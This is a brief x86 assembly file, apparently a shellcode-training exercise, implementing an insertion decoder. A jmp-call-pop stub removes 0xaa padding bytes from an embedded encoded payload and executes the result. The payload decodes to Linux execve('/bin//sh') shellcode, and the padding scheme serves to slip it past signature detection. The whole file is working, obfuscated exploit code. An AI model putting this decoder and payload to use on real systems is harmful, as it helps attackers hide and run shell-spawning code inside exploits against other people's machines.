; Insertion decoder
; Remove the 0xaa from the encoded shellcode and execute it 

global _start

_start:
	jmp call_shellcode

decoder:
	pop esi
	; Point to 0xaa
	lea edi, [esi + 1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx	

decode:
	; Exit routine
	mov bl, BYTE [esi + eax]
	xor bl, 0xaa
	jnz encoded_shellcode

	; Instructions used to remove the 0xaa from the encoded shellcode	
	mov bl, BYTE [esi + eax + 1]
	mov BYTE [edi], bl

	; Increment counters
	add al, 2
	inc edi
	jmp decode

call_shellcode:
	call decoder
	encoded_shellcode: db 0x31,0xaa,0xc0,0xaa,0x50,0xaa,0x68,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x68,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x89,0xaa,0xe3,0xaa,0x50,0xaa,0x89,0xaa,0xe2,0xaa,0x53,0xaa,0x89,0xaa,0xe1,0xaa,0xb0,0xaa,0x0b,0xaa,0xcd,0xaa,0x80,0xaa, 0xbb, 0xbb	
